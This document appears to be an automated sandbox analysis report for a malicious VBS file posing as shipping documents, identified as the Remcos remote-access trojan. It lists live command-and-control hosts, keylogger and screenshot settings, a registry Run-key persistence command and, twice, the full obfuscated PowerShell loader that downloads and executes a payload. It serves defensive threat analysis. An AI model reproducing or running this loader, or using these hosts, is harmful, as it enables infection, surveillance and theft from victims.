Overview

overview

10

Static

static

1

awb_shippi...00.vbs

windows7-x64

10

awb_shippi...00.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09-12-2024 07:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    awb_shipping_documents_bl_inv_doc_2024_12_09_KR_000000000000000.vbs

  • Size

    27KB

  • MD5

    1ebca97c281e08af9e49d1dd74e5747b

  • SHA1

    17183b08474e8abf08b2bb03d55932bc7dbb041b

  • SHA256

    e019f271fcf4206af6a0a01dc9dc6bfdbe7e1a703b6965ded83838ec7f4ea76b

  • SHA512

    3e54258ac11c3885e70995ff6b703407776814f2421a5226bf341bddc4a9ff24193281f3aba0de1f70c43ea6751e1328a5e5844444481437f99a60f307c11af3

  • SSDEEP

    192:FCvyc7uc5bEE7l1GTGhhYSTBwHJL/3HmbrYLjIx6vudvLhvGgkttbxzocsdpLwf6:y6c5t7HmaWl0Cuoud8gULvsdpoCkY

Score
10/10
remcosnewdiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

New

C2

janout21oadsts1.duckdns.org:57484

janout21oadsts1.duckdns.org:57483

janout21oadsts2.duckdns.org:57484

janout21oadsts3.duckdns.org:57484

janout21oadsts4.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    amaonspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    lmoijuetgtso-X0FCJD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_bl_inv_doc_2024_12_09_KR_000000000000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Uteralgia108='Interdiffused213';;$Fieldman33='Fikserbillederne';;$Hallels='Brough';;$Soddenness='Cyanogenic';;$Grubbery=$host.Name;function Fendillation($Morendes){If ($Grubbery) {$Tudegrimt=5} for ($Villa=$Tudegrimt;;$Villa+=6){if(!$Morendes[$Villa]){cls;break }$Tampende+=$Morendes[$Villa];$Fleerish='Sanerings'}$Tampende}function Hjt($Misdescriptive){ .($Heterotrophy) ($Misdescriptive)}$Fygesands=Fendillation 'N.dstnChandeLitotTPadle. Undew';$Fygesands+=Fendillation ' Wi.leNumenbCurryc GewgLSiksai Bo tEOve,bNS,aket';$Rehabiliterings=Fendillation 'gallyM.uckeoOms rzUnevai T ial Nun.ls imoaReca /';$Reproached=Fendillation ' ElekTBegralFjottsGoldb1 Anti2';$Tsiltaden='Barnd[punctNKno ke GennTs.per.ErhvesStignE trejRGingivPrissi SkriCUnaccESku,lpp,eurO AfsvI kok nChirrtQua,rmR mena CrennSubt,aRetragid ntESlyngRBegot]Lambi: Dele:AfkrfSStnknePugerC.olfruGynkorSmuglI ltraT PrinyUnrefpGl ttr eg foPuk eTBodysOLacetCMas uOFurthlUnaut= ybde$SmertR Hi ceVerdePAssu.r Ops OGraphaInfluCHyperHLovfoEBagvaD';$Rehabiliterings+=Fendillation 'taleh5Semip. Bore0Tande Mnten(OmbryWRe tiiZaptinTrei dRigskoTruc wForsus Bloe PeroxNElachTBeda Infel1Ringe0Uafhj.Touch0Teac,; Sk i AbreWr bbiiProg.nAmala6Condy4Tirer; .row ,estxLopho6 Capr4Usneo;Unrea casi r onnevLege.: dili1konsu3etage1M rho. S,an0.edeh)Befo EconsGAntice Ar ycUngnak lawkoGirel/Sbred2attri0Udsty1galva0 uach0diplo1Midts0Andes1 Homo LushFGlim iUnensr de aeHin,sfDr,oloDirgex naph/Chest1inden3 Reco1Cragg.Menis0';$Slutakter=Fendillation 'Aabenuskuess RgfaeAct vRSuper-PhoreaAnne,G ntroE frimNA phit';$Visioner=Fendillation 'StoryhH,evntulotrtLiderp FormsPisto:Ter.a/Tvang/KongeksfartrEndottUdmajoRetsmpTvegeu OmphpAnele. SupecLa stoTmrermBi.le/curacPCanalhudygta AudieSiphotK nta. HellxSe tosDomesn Toad> GasthUdviktGudhjtI plupSpa ssPers,:nonp./Ugl n/BrugekTagkorundsit Autoo datapUnperuMouripLasersShipw.Coun cAns ao Fun mbarm /S,jtePBils h aloaNonfueMil et Fers.ri.erxPostvs Euryn';$Welldoing=Fendillation 'Belus>';$Heterotrophy=Fendillation 'PintlI Slu e delex';$Restaurationsklausulens='Preerection';$Cybernazister='\Krumningers.For';Hjt (Fendillation 'Iat o$ Galvg No pLUnderoSuggebSatinAApololKnopp:ChyliP,amptisituan Ch pce.omouSamviStamsd=Sugge$Bal aevendiNCozyiVTurqu:DemioaEar lPKultupBa gaDReen aGoalpt biopaaa.ds+ hvid$ ,ushCSquatYK istBStrinEtur,erWinstnAs roA lasZStormI V.tasTtninTCapereSpri.R');Hjt (Fendillation ' Flow$EthnoGDiff,LPositoUnderbKsesraGri eLCheil:tweilBAmorei ,ylosAula HReadlO anklPTretrr Ar aI f ekC F.rs= rave$ omplV olkiAnastsTeoreiUnscaoTredenSpeciE DeviRAfspa. DiffsCurubPP.okuLVenirISysteTAfska( ilip$ C ntWGimmeEJehovlAddrsl TelodSchelOTil rI Ono.NNedarg Fl n)');Hjt (Fendillation $Tsiltaden);$Visioner=$Bishopric[0];$Udbudsmaterialet=(Fendillation 'Takke$St onGAdoptLSydveoKorreBOutcla B.leLhunde:ArbejEHjnelvMesi eHirtscUnumpT imesOFragmRPse d=DevalnUniveeRibbow sche-GambloMatinb ,nubJ anisE lricc Penit.room SpeciS Clowy rnitSUnfeltG anaEcr stMManni.Clito$journFEtageyUnabuGHawkiETr ins PaakAAdlednM dtaDKo trs');Hjt ($Udbudsmaterialet);Hjt (Fendillation 'Voksd$FynboeLoftsv Fyr eMrne cGalastUnd.ro Ca erEmitt.TearaHTu inesekanaCaut dNonmeeDyrsbrS,lfosSpui,[Grund$kamerS EleulTrlbiuOverftUn ypa HalvkW athtVaredePyromrPensi]Kulsv=Ref.t$TiljuRScutceEjakuh Bemaa OxonbQuadri Dis lop,eviViroltGolose,ptryrBver.i Ant nDece gStorts');$Bogkafpjens=Fendillation 'S nas$,ubade RgtevTetraeHa nec At mtFortro BottrKysha. Ru,eDPoppeo No.hwFoldnnPlattlTitrao Ha eaRegnedpremiFRabiai Globl A dee Keyb(Afs,j$DefenVsejlmi nreasOptimiFilm.oSalmen UnapeKr,gerLigbr,palla$Ca,teGUnridaRa npsT temtSt atiZygomgCafethFormat Plac)';$Gastight=$Pincus;Hjt (Fendillation 'Und r$EunukG Lob lB ggeoPuntab Ber aRoskil i no: atios FormPStr,ni StruRFeathOAbdicitriplLgrns i CoasCAfs r=Lepro(KarentH mmaeArsenSMisreTBoygd-.reatPn,vneaAbutsT ,ingh off, Krimi$SphenGOphreA eoriSRe heTUnacci CogngAnw.eHMidwiTPlain)');while (!$Spiroilic) {Hjt (Fendillation ' oly $CarligirreglKoppeo .amsbM stra B,xblIkono:Ecka RModsvoBe kinP owlgB yaneDommeuU,derrVan a=She t$CensoU F.rie Salvr J ckkTarsoeslangnDetondT appeGaardlAnnekiM,llegtorbjt') ;Hjt $Bogkafpjens;Hjt (Fendillation ' ekresPr not Non.aP stmRMe suTmult.-GeninSUnme,l Linje phiseLittePPrikk ers a4');Hjt (Fendillation ' Medi$ Hyd.gBirgil F,weoApartBudgi ACon eL uri:DvaleSrentepF rreIt.yksRRhodyOsignei.labeLB nemiBkke,CSvidn=,gadf(S,amfT hiloemobbiSReferTTagvi-SulphpUnfebaV rmiTSt.nhHRetu, ker e$For bG RecoASkistssouplT AsciiT thoGStilnH eamT Re.n)') ;Hjt (Fendillation 'Salv $ E nrGOdgerL fur ODecimbH nnaAC llaLFarve:BustlSwarraTTi thI elnT,rnedh,erveIW iskE.alvts Mas,= Pagi$OptioGsnowelAsiatoGra ubTreh.AOp,idL Pil :OldfrhNephaE Mi aa Ly tvScoutEcolonnbo ofiKarriSA fliE BindsDishe+Eupho+Lynt %machi$forvaBCoracISessiSbelveh etio Me.lpWindwrFor,iI ApprC Hete.bisamCM croOStr jU Kar NRoberT') ;$Visioner=$Bishopric[$Stithies]}$Urtaagernes=308387;$Upolitiske=32101;Hjt (Fendillation 'U.lig$ studgc rvilIngbeoChlorBAutooasur ilForma: anisb FaveuPreanR Marke IdenAPaupeuPhen.cBagveRDrkgia UdfoT nexhiLi,evzKuperePause Ladin= ,eel FeriG NonpE rchbTDerai-Fagl.CTrirhoSuthenhorriT allieFu,ktnGallbt Amat Sulba$ModiaG ndoda Pa psMur rtMispeI L.cqgkvindHTaktrT');Hjt (Fendillation 'Dross$RegiogS orilGunpoo astebPeculaUncirlse io: Heb E Sambk IngesStatupH lveoMeta.n S eneovergnJeanetKristiTrommaForkol E.uil M tciTabulgpaa knBulniiSju knU,teggCharme CounrTermisSki.f Omsvb=f bro ,nre[Best,S M scyMotorsBlacktIntereca.bumSuspe.CoconCExcaroUnpucnTh.odvHemate Tal,rPrimitPhono]Tr.es:Aeros:PptdoF Bilir igbro chuamproctBUnpapa KalisS iveeFor.s6Dynge4BlgebSfernat ThanrPachyiEf ernUvseng Fing(Rough$Un erB BensuResidrOutlaeGauchaSkovjuLativcAnalyrDemagaUnimptPrakti PdagzNemateUn.cc)');Hjt (Fendillation ' Feeb$ LaurGAflaal uipoKatipBb etraGeoetl Urte:Sprg uTrolonNondiF kaktR Van.InonnoA Hed rCalcalK nfiiChry K VandEGasbo Zo,c=dress Lovgi[BlodssDrif y PrioSOutlaTOverieG ponM Anko. Jul tKons E,heckXPintaTblo a.Tim rE Pulvn.arkecColpooPrinsdMaltaiOplsnN Lyk GS,abl]Klito: epto: spilaBeskysP sepcUnproiNea eI Afna.FormugKo rdedige.TfaktusRundktOpporR SrgmiStetiNAnt nGFredn(Hexad$ BoltEForkaK u,loSTentwpAlpinoS,ssaN PerseB ckpNVindiTPuttiIVild aVarmelH nonLGl ciIRe.ccg storNGrydrIFors.NAvo egModsteBeskerLegioS,arda)');Hjt (Fendillation ' Skol$TraumgFodgnl C nlOGingebGratiar linLHa.va:OmklaLB chai BrneS Te,mt FakuiTilbagKlodsePrsti=Freml$SamorUOriginunprofBolstr oddI egneaPulterMarjal risiISkn,ik Sup eAntr,. MetaS.vercU angeb DuimsParceT NoncrNyh.dIErotiNnyereG Bif (Gokke$OptjeUKlbenrBunioT BegyASputnAPost,gSubreeRuralRSalgsnreticESnurrSSelvs, delt$DagpeuPhaeipVenteOKlemmLKvalii.ixtitacc,li UdenSMonogk.outyECrea )');Hjt $Listige;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1968
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Uteralgia108='Interdiffused213';;$Fieldman33='Fikserbillederne';;$Hallels='Brough';;$Soddenness='Cyanogenic';;$Grubbery=$host.Name;function Fendillation($Morendes){If ($Grubbery) {$Tudegrimt=5} for ($Villa=$Tudegrimt;;$Villa+=6){if(!$Morendes[$Villa]){cls;break }$Tampende+=$Morendes[$Villa];$Fleerish='Sanerings'}$Tampende}function Hjt($Misdescriptive){ .($Heterotrophy) ($Misdescriptive)}$Fygesands=Fendillation 'N.dstnChandeLitotTPadle. Undew';$Fygesands+=Fendillation ' Wi.leNumenbCurryc GewgLSiksai Bo tEOve,bNS,aket';$Rehabiliterings=Fendillation 'gallyM.uckeoOms rzUnevai T ial Nun.ls imoaReca /';$Reproached=Fendillation ' ElekTBegralFjottsGoldb1 Anti2';$Tsiltaden='Barnd[punctNKno ke GennTs.per.ErhvesStignE trejRGingivPrissi SkriCUnaccESku,lpp,eurO AfsvI kok nChirrtQua,rmR mena CrennSubt,aRetragid ntESlyngRBegot]Lambi: Dele:AfkrfSStnknePugerC.olfruGynkorSmuglI ltraT PrinyUnrefpGl ttr eg foPuk eTBodysOLacetCMas uOFurthlUnaut= ybde$SmertR Hi ceVerdePAssu.r Ops OGraphaInfluCHyperHLovfoEBagvaD';$Rehabiliterings+=Fendillation 'taleh5Semip. Bore0Tande Mnten(OmbryWRe tiiZaptinTrei dRigskoTruc wForsus Bloe PeroxNElachTBeda Infel1Ringe0Uafhj.Touch0Teac,; Sk i AbreWr bbiiProg.nAmala6Condy4Tirer; .row ,estxLopho6 Capr4Usneo;Unrea casi r onnevLege.: dili1konsu3etage1M rho. S,an0.edeh)Befo EconsGAntice Ar ycUngnak lawkoGirel/Sbred2attri0Udsty1galva0 uach0diplo1Midts0Andes1 Homo LushFGlim iUnensr de aeHin,sfDr,oloDirgex naph/Chest1inden3 Reco1Cragg.Menis0';$Slutakter=Fendillation 'Aabenuskuess RgfaeAct vRSuper-PhoreaAnne,G ntroE frimNA phit';$Visioner=Fendillation 'StoryhH,evntulotrtLiderp FormsPisto:Ter.a/Tvang/KongeksfartrEndottUdmajoRetsmpTvegeu OmphpAnele. SupecLa stoTmrermBi.le/curacPCanalhudygta AudieSiphotK nta. HellxSe tosDomesn Toad> GasthUdviktGudhjtI plupSpa ssPers,:nonp./Ugl n/BrugekTagkorundsit Autoo datapUnperuMouripLasersShipw.Coun cAns ao Fun mbarm /S,jtePBils h aloaNonfueMil et Fers.ri.erxPostvs Euryn';$Welldoing=Fendillation 'Belus>';$Heterotrophy=Fendillation 'PintlI Slu e delex';$Restaurationsklausulens='Preerection';$Cybernazister='\Krumningers.For';Hjt (Fendillation 'Iat o$ Galvg No pLUnderoSuggebSatinAApololKnopp:ChyliP,amptisituan Ch pce.omouSamviStamsd=Sugge$Bal aevendiNCozyiVTurqu:DemioaEar lPKultupBa gaDReen aGoalpt biopaaa.ds+ hvid$ ,ushCSquatYK istBStrinEtur,erWinstnAs roA lasZStormI V.tasTtninTCapereSpri.R');Hjt (Fendillation ' Flow$EthnoGDiff,LPositoUnderbKsesraGri eLCheil:tweilBAmorei ,ylosAula HReadlO anklPTretrr Ar aI f ekC F.rs= rave$ omplV olkiAnastsTeoreiUnscaoTredenSpeciE DeviRAfspa. DiffsCurubPP.okuLVenirISysteTAfska( ilip$ C ntWGimmeEJehovlAddrsl TelodSchelOTil rI Ono.NNedarg Fl n)');Hjt (Fendillation $Tsiltaden);$Visioner=$Bishopric[0];$Udbudsmaterialet=(Fendillation 'Takke$St onGAdoptLSydveoKorreBOutcla B.leLhunde:ArbejEHjnelvMesi eHirtscUnumpT imesOFragmRPse d=DevalnUniveeRibbow sche-GambloMatinb ,nubJ anisE lricc Penit.room SpeciS Clowy rnitSUnfeltG anaEcr stMManni.Clito$journFEtageyUnabuGHawkiETr ins PaakAAdlednM dtaDKo trs');Hjt ($Udbudsmaterialet);Hjt (Fendillation 'Voksd$FynboeLoftsv Fyr eMrne cGalastUnd.ro Ca erEmitt.TearaHTu inesekanaCaut dNonmeeDyrsbrS,lfosSpui,[Grund$kamerS EleulTrlbiuOverftUn ypa HalvkW athtVaredePyromrPensi]Kulsv=Ref.t$TiljuRScutceEjakuh Bemaa OxonbQuadri Dis lop,eviViroltGolose,ptryrBver.i Ant nDece gStorts');$Bogkafpjens=Fendillation 'S nas$,ubade RgtevTetraeHa nec At mtFortro BottrKysha. Ru,eDPoppeo No.hwFoldnnPlattlTitrao Ha eaRegnedpremiFRabiai Globl A dee Keyb(Afs,j$DefenVsejlmi nreasOptimiFilm.oSalmen UnapeKr,gerLigbr,palla$Ca,teGUnridaRa npsT temtSt atiZygomgCafethFormat Plac)';$Gastight=$Pincus;Hjt (Fendillation 'Und r$EunukG Lob lB ggeoPuntab Ber aRoskil i no: atios FormPStr,ni StruRFeathOAbdicitriplLgrns i CoasCAfs r=Lepro(KarentH mmaeArsenSMisreTBoygd-.reatPn,vneaAbutsT ,ingh off, Krimi$SphenGOphreA eoriSRe heTUnacci CogngAnw.eHMidwiTPlain)');while (!$Spiroilic) {Hjt (Fendillation ' oly $CarligirreglKoppeo .amsbM stra B,xblIkono:Ecka RModsvoBe kinP owlgB yaneDommeuU,derrVan a=She t$CensoU F.rie Salvr J ckkTarsoeslangnDetondT appeGaardlAnnekiM,llegtorbjt') ;Hjt $Bogkafpjens;Hjt (Fendillation ' ekresPr not Non.aP stmRMe suTmult.-GeninSUnme,l Linje phiseLittePPrikk ers a4');Hjt (Fendillation ' Medi$ Hyd.gBirgil F,weoApartBudgi ACon eL uri:DvaleSrentepF rreIt.yksRRhodyOsignei.labeLB nemiBkke,CSvidn=,gadf(S,amfT hiloemobbiSReferTTagvi-SulphpUnfebaV rmiTSt.nhHRetu, ker e$For bG RecoASkistssouplT AsciiT thoGStilnH eamT Re.n)') ;Hjt (Fendillation 'Salv $ E nrGOdgerL fur ODecimbH nnaAC llaLFarve:BustlSwarraTTi thI elnT,rnedh,erveIW iskE.alvts Mas,= Pagi$OptioGsnowelAsiatoGra ubTreh.AOp,idL Pil :OldfrhNephaE Mi aa Ly tvScoutEcolonnbo ofiKarriSA fliE BindsDishe+Eupho+Lynt %machi$forvaBCoracISessiSbelveh etio Me.lpWindwrFor,iI ApprC Hete.bisamCM croOStr jU Kar NRoberT') ;$Visioner=$Bishopric[$Stithies]}$Urtaagernes=308387;$Upolitiske=32101;Hjt (Fendillation 'U.lig$ studgc rvilIngbeoChlorBAutooasur ilForma: anisb FaveuPreanR Marke IdenAPaupeuPhen.cBagveRDrkgia UdfoT nexhiLi,evzKuperePause Ladin= ,eel FeriG NonpE rchbTDerai-Fagl.CTrirhoSuthenhorriT allieFu,ktnGallbt Amat Sulba$ModiaG ndoda Pa psMur rtMispeI L.cqgkvindHTaktrT');Hjt (Fendillation 'Dross$RegiogS orilGunpoo astebPeculaUncirlse io: Heb E Sambk IngesStatupH lveoMeta.n S eneovergnJeanetKristiTrommaForkol E.uil M tciTabulgpaa knBulniiSju knU,teggCharme CounrTermisSki.f Omsvb=f bro ,nre[Best,S M scyMotorsBlacktIntereca.bumSuspe.CoconCExcaroUnpucnTh.odvHemate Tal,rPrimitPhono]Tr.es:Aeros:PptdoF Bilir igbro chuamproctBUnpapa KalisS iveeFor.s6Dynge4BlgebSfernat ThanrPachyiEf ernUvseng Fing(Rough$Un erB BensuResidrOutlaeGauchaSkovjuLativcAnalyrDemagaUnimptPrakti PdagzNemateUn.cc)');Hjt (Fendillation ' Feeb$ LaurGAflaal uipoKatipBb etraGeoetl Urte:Sprg uTrolonNondiF kaktR Van.InonnoA Hed rCalcalK nfiiChry K VandEGasbo Zo,c=dress Lovgi[BlodssDrif y PrioSOutlaTOverieG ponM Anko. Jul tKons E,heckXPintaTblo a.Tim rE Pulvn.arkecColpooPrinsdMaltaiOplsnN Lyk GS,abl]Klito: epto: spilaBeskysP sepcUnproiNea eI Afna.FormugKo rdedige.TfaktusRundktOpporR SrgmiStetiNAnt nGFredn(Hexad$ BoltEForkaK u,loSTentwpAlpinoS,ssaN PerseB ckpNVindiTPuttiIVild aVarmelH nonLGl ciIRe.ccg storNGrydrIFors.NAvo egModsteBeskerLegioS,arda)');Hjt (Fendillation ' Skol$TraumgFodgnl C nlOGingebGratiar linLHa.va:OmklaLB chai BrneS Te,mt FakuiTilbagKlodsePrsti=Freml$SamorUOriginunprofBolstr oddI egneaPulterMarjal risiISkn,ik Sup eAntr,. MetaS.vercU angeb DuimsParceT NoncrNyh.dIErotiNnyereG Bif (Gokke$OptjeUKlbenrBunioT BegyASputnAPost,gSubreeRuralRSalgsnreticESnurrSSelvs, delt$DagpeuPhaeipVenteOKlemmLKvalii.ixtitacc,li UdenSMonogk.outyECrea )');Hjt $Listige;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagnering" /t REG_EXPAND_SZ /d "%Undersettling172% -windowstyle 1 $Miljplaners207=(gp -Path 'HKCU:\Software\Tedder\').Vrdibrevet;%Undersettling172% ($Miljplaners207)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagnering" /t REG_EXPAND_SZ /d "%Undersettling172% -windowstyle 1 $Miljplaners207=(gp -Path 'HKCU:\Software\Tedder\').Vrdibrevet;%Undersettling172% ($Miljplaners207)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2984

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    872d77bb3cd3d5cf4ca7045b5cfeb2d6

    SHA1

    b50ca2d69adb81e9e5cc5c7e261f7ef0df89ab1f

    SHA256

    185abe872d4649379e6d5ad9dac1a52f552b7de8e26d2a9e7ac0f1e5719345c1

    SHA512

    e79754760f42092041cc463d8c0c6dedcbe0863226dc1fc32eafb3c2d4f68722341c4b879430c83cad6856f0ebab76087d104f14e2dec0bf1c443c984f4bc51e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab9697.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar50EF.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Krumningers.For
    Filesize

    443KB

    MD5

    88bbb484f41559f21e0abdd08a538cfe

    SHA1

    090dabd601a08f2e5710cee132305583cb29d7e1

    SHA256

    4cab5644ef8622ba68e30cc282680089acaec46c8f22168dfb2e31a6523b65fb

    SHA512

    bd8c0553f5a4efa82c589afce1e118cfc46455d91e10b029511a3d18bfb3c691d1da7f187ac033fd3fc20e0337ad2e2aeb3532e2963c7bcd52b0ba972eb76ee0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZRK48MLV9IPUMOQ8WVWP.temp
    Filesize

    7KB

    MD5

    b109c16af0a8708d1efa26ba5ea371d8

    SHA1

    36bf3c06eb6df5761b14b89c3c6123985c11713b

    SHA256

    229b6e0140d806856bd4f164976119c0ce501992718c1a603c4c2afb8ff3d780

    SHA512

    a37fe552631acbf086267b8da1adfc9cc5c68782b042fff7bde6b320cb81412fc71c08bf3ee49517316f5b301a30264a9cc9c34115a1170465fc066b1f310c96

    Download Submit

  • memory/1968-28-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1968-25-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1968-26-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1968-24-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1968-30-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1968-22-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1968-23-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1968-21-0x000000001B600000-0x000000001B8E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1968-20-0x000007FEF5DAE000-0x000007FEF5DAF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2140-35-0x0000000000F90000-0x0000000001FF2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2140-53-0x0000000000F90000-0x0000000001FF2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2620-34-0x0000000006540000-0x00000000096BD000-memory.dmp

    Filesize

    49.5MB

    Download